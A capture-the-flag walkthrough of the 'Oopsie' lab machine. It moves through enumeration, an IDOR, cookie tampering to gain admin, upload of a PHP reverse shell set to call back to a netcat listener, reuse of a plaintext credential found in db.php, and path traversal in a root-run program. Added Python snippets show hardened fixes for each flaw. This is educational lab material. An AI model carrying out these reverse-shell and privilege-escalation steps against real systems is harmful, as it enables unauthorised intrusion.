
Oopsie

Enumeration


As usual, let's start with nmap:

nmap -sV -sC 10.129.95.191

Port 80 is open, so let's check the website.

Open your browser and type in the URL bar: http://10.129.95.191

As usual, let's run gobuster next. First locate the wordlist we are going to use:

locate big.txt

Let's use this wordlist:

/opt/useful/SecLists/Discovery/Web-Content/big.txt

gobuster dir -u 10.129.95.191 -w /opt/useful/SecLists/Discovery/Web-Content/big.txt

Let's use Burp Suite. Open Burp Suite and click on the Proxy tab.

Turn off intercept.

Click on Open Browser.

In the URL bar, type http://10.129.95.191

Go back to Burp and click on the Target tab.

We found something interesting: a directory called /cdn-cgi/login

This directory was not picked up by our gobuster run earlier.


Let's open our browser from our VM and in the URL bar, type:

http://10.129.95.191/cdn-cgi/login

We do not know any credentials, but there is a link "Login as Guest".

Click on "Login as Guest".

We are logged in!

Let's click on Account.

We are logged in as user guest, access ID 2233.


Look at the URL bar.

What if we were to change &id=2 into &id=1?

Let's try: change the end of the URL and press Enter.

Now we can see there is another user called admin with access ID 34322.

We were not meant to see that, but it is a vulnerability of the target machine: the server trusts the id in the URL without checking that the logged-in user is allowed to view that record.

So we just learned that the user guest has an access ID of 2233 and the user admin has an access ID of 34322.


Now let's click on the Uploads tab on the website:

This action requires super admin rights. So if we had super admin rights, we would be able to upload files to the target machine. Interesting!

Right click on this web page and click on Inspect (Q).

Now click on the Storage tab; we can see the following cookie:

At the moment we are logged in as the user guest with access ID 2233.

What if we could change the cookie so that we are now user admin with access ID 34322?

Let's try! Replace guest with admin and replace 2233 with 34322.

Now refresh the Uploads page and we get the following:

We are now admin and we can upload files!
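
As an added example (not code from the Oopsie box or its web application), here is what the two flaws above look like on the server side next to the fix a developer would want: the vulnerable handlers trust the id in the URL and the user field in the client-editable cookie, while the hardened ones authorise on a session cookie that is HMAC-signed with a server-side secret. The user table, ids and secret are constructed sample values.

```python
import hashlib
import hmac

# Constructed user table mirroring what the page reveals (guest/2233, admin/34322).
USERS = {1: {"name": "admin", "access_id": 34322},
         2: {"name": "guest", "access_id": 2233}}
SECRET = b"constructed-server-side-secret"  # assumption: known only to the server

def vulnerable_account(query_id, cookie):
    """Trusts ?id= directly: changing id=2 to id=1 reveals admin (IDOR)."""
    return USERS.get(int(query_id))

def vulnerable_can_upload(cookie):
    """Trusts the client-editable cookie: setting user=admin grants uploads."""
    return cookie.get("user") == "admin"

def sign_session(user_id):
    """Issue a cookie carrying only the user id plus an HMAC the client cannot forge."""
    payload = str(user_id).encode()
    tag = hmac.new(SECRET, payload, hashlib.sha256).hexdigest()
    return f"{user_id}.{tag}"

def verify_session(cookie):
    """Return the authenticated user id, or None if the cookie was altered."""
    uid, sep, tag = cookie.rpartition(".")
    if not sep or not (uid.isascii() and uid.isdigit()):
        return None
    expected = hmac.new(SECRET, uid.encode(), hashlib.sha256).hexdigest()
    return int(uid) if hmac.compare_digest(tag.encode(), expected.encode()) else None

def hardened_account(query_id, cookie):
    """Authorise on the verified session: a guest may only view its own record."""
    uid = verify_session(cookie)
    user = USERS.get(uid)
    if user is None:
        return None  # 401: no valid session
    if int(query_id) != uid and user["name"] != "admin":
        return None  # 403: not your record
    return USERS.get(int(query_id))

def hardened_can_upload(cookie):
    """The upload privilege comes from the verified session, never from cookie fields."""
    user = USERS.get(verify_session(cookie))
    return user is not None and user["name"] == "admin"
```

Rewriting the user id inside a signed cookie invalidates the tag, so the tampered cookie is treated as no session at all.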




Foothold

Now let's try to upload a file.


Let's first locate the PHP reverse shell file and edit it.

Open a new command prompt from your VM and type:

locate webshells/php

cd /usr/share/webshells/php

then:

ls

We are interested in php-reverse-shell.php

Let's make a copy of this file into our home directory by typing:

cp php-reverse-shell.php /home/htb-sneakymouse/oopsie.php

My username is htb-sneakymouse on my VM, this is why I used /home/htb-sneakymouse. Replace this with your own username.

Now open a brand new command prompt and type:

ls

I can see oopsie.php has been successfully copied to my home directory.

Let's now edit oopsie.php using:

sudo nano oopsie.php

Scroll down until you see $ip and $port.

We need to change both the IP and the port:

- replace 127.0.0.1 with the IP of your VM. If you don't know your IP, open a new command prompt window and type ifconfig tun0

- replace 1234 with 4444 (we will listen on port 4444 when we set up our netcat listener later)

Press Ctrl + X to exit.

Press Y to save.

Press Enter.


Now let's upload this file to the target machine. Let's go back to the Uploads tab on the website:

We can now click on Browse.

Select our file oopsie.php and click on Open.

Now click on Upload.

Looks like our file oopsie.php has been uploaded successfully. However, we still don't know where it has been uploaded.

Remember, earlier when we ran the gobuster command, it found a directory called /uploads.

Perhaps this is where the file has been uploaded!
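
The upload form accepted a .php file and the web server later executed it from /uploads, which is what turns a file upload into code execution. As an added example (not the box's code), here is the validation a defender would put in front of that handler: one extension only, from an allowlist, whose content matches its magic bytes and contains no PHP tag, stored under a server-chosen name. The allowlist, magic bytes and sample upload bodies are constructed for the example.

```python
import os
import pathlib
import secrets

# Constructed allowlist: extension -> magic bytes the file body must start with.
ALLOWED = {".png": b"\x89PNG\r\n\x1a\n", ".jpg": b"\xff\xd8\xff", ".gif": b"GIF8"}

# Constructed sample bodies: a stand-in for php-reverse-shell.php and a bare PNG header.
PHP_BODY = b"<?php /* reverse shell body omitted */ ?>"
PNG_BODY = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16

def check_upload(filename, data):
    """Return (accepted, reason). Each rule on its own would have rejected oopsie.php."""
    name = os.path.basename(filename.replace("\\", "/"))  # drop any client-supplied path
    suffixes = pathlib.PurePath(name).suffixes           # "shell.php.png" -> two suffixes
    if len(suffixes) != 1:
        return False, "exactly one extension expected"
    ext = suffixes[0].lower()
    if ext not in ALLOWED:
        return False, f"extension {ext} not allowed"
    if not data.startswith(ALLOWED[ext]):
        return False, "content does not match extension"
    if b"<?" in data:
        return False, "PHP open tag inside upload body"
    return True, "ok"

def storage_name(filename):
    """Server-chosen name: the uploader can neither pick .php nor guess /uploads/<name>."""
    ext = pathlib.PurePath(filename).suffix.lower()
    return secrets.token_hex(16) + ext
```

Storing the file outside the web root (or in a directory where the server has PHP execution disabled) closes the remaining gap even if a check above is later relaxed.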


First let's set up our netcat listener on port 4444. From your VM, open a new command prompt window and type:

nc -lnvp 4444

Now let's try to locate and run the oopsie.php we just uploaded to our target machine. In the URL bar, type the address of the uploaded file:

Nothing should happen in the browser, but if you go back to your netcat (nc) command prompt, you should now have a shell:

Type:

whoami

Let's upgrade our shell using:

python3 -c 'import pty;pty.spawn("/bin/bash")'

ls

cd home
ls

cd robert
ls

cat user.txt

f2c74ee8db7983851ab2a96a44eb7981

Congratulations! You got the user flag!




Lateral Movement

sudo -l

Unfortunately, we don't have the password.

Let's explore the files on the target machine. Let's start with /var/www/html:

cd /var/www/html

ls

cd cdn-cgi
ls

cd login
ls

cat db.php

Looks like we found some credentials:

username: robert

password: M3g4C0rpUs3r!

This shell is not super stable, but now we have some credentials!

We know from the nmap scan at the beginning that port 22 (SSH) is open on the target machine. Let's try to SSH in using robert's credentials:

ssh robert@10.129.95.191

The password is:

M3g4C0rpUs3r!

We are in!

id

Privilege Escalation

locate bugtracker

cd /usr/bin

bugtracker

Type 1, for instance.

bugtracker

This time, type hello, for instance.

Interesting: this time we get "/root/reports/hello: No such file or directory", so the program appends whatever we type to the path /root/reports/ and reads that file without checking the input.

bugtracker

This time, type:

../root.txt

Congratulations! You found the root flag!

af13b0bee69f8a877c3faf667f7beacf
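
The bugtracker behaviour above (input glued onto /root/reports/ and read with root privileges) is a path traversal. As an added example, not the box's binary, here is the lookup written both ways in Python: the vulnerable form reproduces what the page observed, and the safe form accepts only a numeric id and confirms the resolved path never leaves the reports directory. It uses a temporary directory as a stand-in for /root/reports and a placeholder file in place of root.txt; a program like this should also not run with root privileges at all, which the path check alone does not fix.

```python
import pathlib
import re
import tempfile

# Constructed stand-in for /root/reports: one report file and a sibling root.txt
# holding a placeholder (the real file is only readable by root).
BASE = pathlib.Path(tempfile.mkdtemp())
REPORTS = BASE / "reports"
REPORTS.mkdir()
(REPORTS / "1").write_text("Bug report 1: constructed sample\n")
(BASE / "root.txt").write_text("PLACEHOLDER-FLAG\n")

def vulnerable_lookup(bug_id):
    """Reproduces the page's bugtracker: user input is appended to the directory path.
    "hello" raises FileNotFoundError (the page's 'No such file'); "../root.txt"
    walks up one level and reads the sibling file."""
    return (REPORTS / bug_id).read_text()

def safe_lookup(bug_id):
    """Return (found, text_or_reason): only numeric ids, only regular files inside REPORTS."""
    if not re.fullmatch(r"[0-9]{1,9}", bug_id):
        return False, "bug id must be numeric"  # rejects "hello" and "../root.txt"
    target = (REPORTS / bug_id).resolve()
    # Defence in depth: even a numeric name could be a symlink pointing elsewhere.
    if target.parent != REPORTS.resolve() or not target.is_file():
        return False, "no such report"
    return True, target.read_text()
```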
